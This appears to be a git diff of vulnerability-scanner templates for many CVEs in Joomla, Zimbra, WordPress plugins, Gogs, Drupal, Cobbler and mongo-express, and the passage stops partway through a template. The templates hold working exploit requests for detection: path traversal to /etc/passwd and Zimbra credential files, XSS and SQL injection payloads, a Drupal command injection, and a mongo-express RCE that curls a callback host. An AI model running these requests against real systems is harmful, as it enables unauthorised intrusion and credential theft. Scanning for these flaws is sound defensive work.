description: Directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11511
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1081
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
classification:
|
||||
cve-id: CVE-2010-1081
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -1,27 +1,26 @@
|
|||
id: CVE-2010-1217
|
||||
|
||||
info:
|
||||
name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.
|
||||
description: A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE -- the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11814
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1217
|
||||
tags: cve,cve2010,joomla,lfi,plugin
|
||||
|
||||
classification:
|
||||
cve-id: CVE-2010-1217
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -0,0 +1,34 @@
|
|||
id: CVE-2012-4547
|
||||
|
||||
info:
|
||||
name: AWStats 6.95/7.0 - 'awredir.pl' Cross-Site Scripting
|
||||
author: dhiyaneshDk
|
||||
severity: medium
|
||||
description: AWStats is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/36164
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2012-4547
|
||||
tags: cve,cve2020,xss,awstats
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E'
|
||||
- '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<script>alert(document.domain)</script>"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,36 @@
|
|||
id: CVE-2013-7091
|
||||
|
||||
info:
|
||||
name: Zimbra Collaboration Server 7.2.2/8.0.2 LFI
|
||||
author: rubina119
|
||||
severity: critical
|
||||
description: Directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2013-7091
|
||||
- https://www.exploit-db.com/exploits/30085
|
||||
- https://www.exploit-db.com/exploits/30472
|
||||
tags: cve,cve2013,zimbra,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00"
|
||||
- "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "zimbra_server_hostname"
|
||||
- "zimbra_ldap_userdn"
|
||||
- "zimbra_ldap_password"
|
||||
- "ldap_postfix_password"
|
||||
- "ldap_amavis_password"
|
||||
- "ldap_nginx_password"
|
||||
- "mysql_root_password"
|
||||
condition: or
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root=.*:0:0"
|
|
@ -18,7 +18,7 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/import–legacy–media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
- "{{BaseURL}}/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -18,7 +18,7 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/podcast–channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"
|
||||
- "{{BaseURL}}/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -18,7 +18,7 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/shortcode–ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"
|
||||
- "{{BaseURL}}/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -18,7 +18,7 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/swipehq–payment–gateway–woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "
|
||||
- "{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -18,7 +18,7 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/ultimate–weather–plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
- "{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -18,7 +18,7 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/wp–planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
- "{{BaseURL}}/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -5,16 +5,19 @@ info:
|
|||
author: dhiyaneshDK
|
||||
severity: high
|
||||
description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.
|
||||
remediation: Upgrade to a supported version of Gog.
|
||||
reference:
|
||||
- http://www.securityfocus.com/bid/71187
|
||||
- http://seclists.org/fulldisclosure/2014/Nov/33
|
||||
- http://packetstormsecurity.com/files/129117/Gogs-Repository-Search-SQL-Injection.html
|
||||
- http://gogs.io/docs/intro/change_log.html
|
||||
- https://github.com/gogits/gogs/commit/0c5ba4573aecc9eaed669e9431a70a5d9f184b8d
|
||||
- http://www.exploit-db.com/exploits/35238
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/98694
|
||||
- http://www.securityfocus.com/archive/1/533995/100/0/threaded
|
||||
tags: cve,cve2014,sqli,gogs
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
cve-id: CVE-2014-8682
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
shodan-query: 'title:"Sign In - Gogs"'
|
||||
|
||||
|
@ -34,3 +37,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/02/04
|
||||
|
|
|
@ -0,0 +1,45 @@
|
|||
id: CVE-2016-10940
|
||||
|
||||
info:
|
||||
name: The zm-gallery plugin 1.0 for WordPress SQLI
|
||||
author: cckuailong
|
||||
severity: high
|
||||
description: The zm-gallery plugin 1.0 for WordPress has SQL injection via the order parameter.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/c0cbd314-0f4f-47db-911d-9b2e974bd0f6
|
||||
- https://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2016-10940
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.2
|
||||
cve-id: CVE-2016-10940
|
||||
cwe-id: CWE-89
|
||||
tags: cve,cve2016,sqli,wp,wordpress,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
req-condition: true
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body_2, "<th scope=\"row\" class=\"check-column\">")'
|
||||
- '!contains(body_3, "<th scope=\"row\" class=\"check-column\">")'
|
||||
condition: and
|
|
@ -30,3 +30,4 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 500
|
||||
|
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2016-3978
|
||||
|
||||
info:
|
||||
name: FortiOS (Fortinet) - Open Redirect and XSS
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: The Web User Interface (WebUI) in FortiOS 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting (XSS) attacks via the "redirect" parameter to "login."
|
||||
reference:
|
||||
- https://seclists.org/fulldisclosure/2016/Mar/68
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2016-3978
|
||||
tags: cve,cve2016,redirect,fortinet,fortios
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2016-3978
|
||||
cwe-id: CWE-79
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/login?redir=http://www.example.com'
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
|
@ -3,7 +3,7 @@ info:
|
|||
author: Random_Robbie
|
||||
name: Apache Struts2 RCE
|
||||
severity: critical
|
||||
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker’s invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
|
||||
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker's invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
|
||||
tags: cve,cve2017,struts,rce,apache
|
||||
reference: https://github.com/mazen160/struts-pwn
|
||||
classification:
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2017-7391
|
||||
|
||||
info:
|
||||
name: Magmi – Cross-Site Scripting v.0.7.22
|
||||
name: Magmi Cross-Site Scripting v.0.7.22
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL.
|
||||
|
@ -25,12 +25,13 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- '"><script>alert(document.domain);</script><'
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"><script>alert(document.domain);</script><'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
part: header
|
|
@ -4,7 +4,8 @@ info:
|
|||
name: Apache Struts2 S2-052 RCE
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads.
|
||||
description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type of filtering, which can lead to Remote Code Execution when deserializing XML payloads.
|
||||
remediation: Apply the appropriate patch.
|
||||
reference:
|
||||
- http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html
|
||||
- https://struts.apache.org/docs/s2-052.html
|
||||
|
@ -93,3 +94,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 500
|
||||
|
||||
# Enhanced by mp on 2022/02/04
|
||||
|
|
|
@ -0,0 +1,60 @@
|
|||
id: CVE-2018-1000226
|
||||
|
||||
info:
|
||||
name: Cobbler versions 2.6.11+, (2.0.0+ or older versions) - Authentication Bypass
|
||||
author: c-sh0
|
||||
severity: critical
|
||||
reference:
|
||||
- https://github.com/cobbler/cobbler/issues/1916
|
||||
- https://movermeyer.com/2018-08-02-privilege-escalation-exploits-in-cobblers-api/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-1000226
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2018-1000226
|
||||
cwe-id: CWE-732
|
||||
tags: cve,cve2018,cobbler,auth-bypass
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST {{BaseURL}}/cobbler_api HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: text/xml
|
||||
|
||||
<?xml version='1.0'?>
|
||||
<methodCall>
|
||||
<methodName>_CobblerXMLRPCInterface__make_token</methodName>
|
||||
<params>
|
||||
<param>
|
||||
<value>
|
||||
<string>cobbler</string>
|
||||
</value>
|
||||
</param>
|
||||
</params>
|
||||
</methodCall>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "Content-Type: text/xml"
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<methodResponse>"
|
||||
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "!contains(tolower(body), '<name>faultCode</name>')"
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "(.*[a-zA-Z0-9].+==)</string></value>"
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: LG NAS Devices - Remote Code Execution (Unauthenticated)
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter.
|
||||
description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the "password" parameter.
|
||||
reference:
|
||||
- https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
|
||||
- https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247
|
||||
|
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: D-Link Routers - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request.
|
||||
description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after "GET /uir" in an HTTP request.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/45678
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-10822
|
||||
|
|
|
@ -10,7 +10,7 @@ info:
|
|||
caused by improper neutralization of special elements.
|
||||
An unauthenticated remote malicious user (or attacker) can supply
|
||||
specially crafted request parameters against Spring Data REST backed HTTP resources
|
||||
or using Spring Data’s projection-based request payload binding hat can lead to a remote code execution attack.
|
||||
or using Spring Data's projection-based request payload binding hat can lead to a remote code execution attack.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-1273
|
||||
tags: cve,cve2018,vmware,rce,spring
|
||||
classification:
|
||||
|
|
|
@ -2,34 +2,38 @@ id: CVE-2018-13380
|
|||
|
||||
info:
|
||||
name: Fortinet FortiOS Cross-Site Scripting
|
||||
author: shelld3v
|
||||
author: shelld3v,AaronChen0
|
||||
severity: medium
|
||||
description: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-13380
|
||||
tags: cve,cve2018,fortios,xss,fortinet
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-13380
|
||||
- https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2018-13380
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2018,fortios,xss,fortinet
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E"
|
||||
- "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B"
|
||||
- "{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<svg/onload=alert(1337)>"
|
||||
part: body
|
||||
- "<script>alert(1337)</script>"
|
||||
condition: or
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "application/json"
|
||||
part: header
|
||||
negative: true
|
||||
|
||||
- type: status
|
||||
|
|
|
@ -1,9 +1,10 @@
|
|||
id: CVE-2018-17254
|
||||
|
||||
info:
|
||||
name: Joomla JCK Editor SQL Injection
|
||||
name: Joomla! JCK Editor SQL Injection
|
||||
author: Suman_Kar
|
||||
description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.
|
||||
remediation: Update or remove the affected plugin.
|
||||
severity: critical
|
||||
tags: joomla,sqli,cve,cve2018
|
||||
reference:
|
||||
|
@ -27,3 +28,5 @@ requests:
|
|||
part: body
|
||||
words:
|
||||
- "nuclei-template"
|
||||
|
||||
# Enhanced by mp on 2022/02/08
|
||||
|
|
|
@ -0,0 +1,35 @@
|
|||
id: CVE-2018-18925
|
||||
info:
|
||||
name: Gogs - Remote Code Execution (CVE-2018-18925)
|
||||
author: princechaddha
|
||||
severity: critical
|
||||
description: Gogs 0.11.66 allows remote code execution because it does not properly validate session IDs, as demonstrated by a ".." session-file forgery in the file session provider in file.go. This is related to session ID handling in the go-macaron/session code for Macaron.
|
||||
reference:
|
||||
- https://www.anquanke.com/post/id/163575
|
||||
- https://github.com/vulhub/vulhub/tree/master/gogs/CVE-2018-18925
|
||||
- https://nvd.nist.gov/vuln/detail/cve-2018-18925
|
||||
remediation: This issue will be fixed by updating to the latest version of Gogs
|
||||
tags: cve,cve2018,gogs,lfi,rce
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2018-18925
|
||||
cwe-id: CWE-384
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cookie: lang=en-US; i_like_gogits=../../../../etc/passwd;
|
||||
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cookie: lang=en-US; i_like_gogits=../../../../etc/dummy;
|
||||
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code_1 == 500 && status_code_2 == 200 && contains(body_2, "<meta name=\"author\" content=\"Gogs\" />")'
|
|
@ -0,0 +1,74 @@
|
|||
id: CVE-2018-7602
|
||||
info:
|
||||
name: Drupal Remote Code Execution Vulnerability
|
||||
author: princechaddha
|
||||
severity: critical
|
||||
description: A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.
|
||||
reference:
|
||||
- https://github.com/vulhub/vulhub/blob/master/drupal/CVE-2018-7602/drupa7-CVE-2018-7602.py
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-7602
|
||||
tags: cve,cve2018,drupal,authenticated
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2018-7602
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /?q=user%2Flogin HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
form_id=user_login&name={{username}}&pass={{password}}&op=Log+in
|
||||
|
||||
- |
|
||||
GET /?q={{url_encode("{{userid}}")}}%2Fcancel HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /?q={{url_encode("{{userid}}")}}%2Fcancel&destination={{url_encode("{{userid}}")}}%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3Decho+COP-2067-8102-EVC+|+rev HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
form_id=user_cancel_confirm_form&form_token={{form_token}}&_triggering_element_name=form_id&op=Cancel+account
|
||||
|
||||
- |
|
||||
POST /?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{{form_build_id}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
form_build_id={{form_build_id}}
|
||||
|
||||
cookie-reuse: true
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'CVE-2018-7602-POC'
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
name: userid
|
||||
internal: true
|
||||
group: 1
|
||||
regex:
|
||||
- '<meta about="([/a-z0-9]+)" property="foaf'
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
name: form_token
|
||||
internal: true
|
||||
group: 1
|
||||
regex:
|
||||
- '<input type="hidden" name="form_token" value="(.*)" />'
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
name: form_build_id
|
||||
internal: true
|
||||
group: 1
|
||||
regex:
|
||||
- '<input type="hidden" name="form_build_id" value="(.*)" />'
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2019-10758
|
||||
info:
|
||||
name: Mongo-Express Remote Code Execution - CVE-2019-10758
|
||||
author: princechaddha
|
||||
severity: critical
|
||||
description: mongo-express before 0.54.0 is vulnerable to Remote Code Execution via endpoints that uses the `toBSON` method. A misuse of the `vm` dependency to perform `exec` commands in a non-safe environment.
|
||||
reference:
|
||||
- https://github.com/vulhub/vulhub/tree/master/mongo-express/CVE-2019-10758
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-10758
|
||||
remediation: This issue will be fixed by updating to the latest version of mongo-express
|
||||
metadata:
|
||||
shodan-query: http.title:"Mongo Express"
|
||||
tags: cve,cve2019,mongo,mongo-express
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 9.90
|
||||
cve-id: CVE-2019-10758
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /checkValid HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Authorization: Basic YWRtaW46cGFzcw==
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl http://{{interactsh-url}}")
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
|
@ -4,12 +4,10 @@ info:
|
|||
name: Zeroshell 3.9.0 Remote Command Execution
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
description: |
|
||||
This template exploits an unauthenticated command injection vulnerability
|
||||
found in ZeroShell 3.9.0 in the "/cgi-bin/kerbynet" url.
|
||||
As sudo is configured to execute /bin/tar without a password (NOPASSWD)
|
||||
it is possible to run root commands using the "checkpoint" tar options.
|
||||
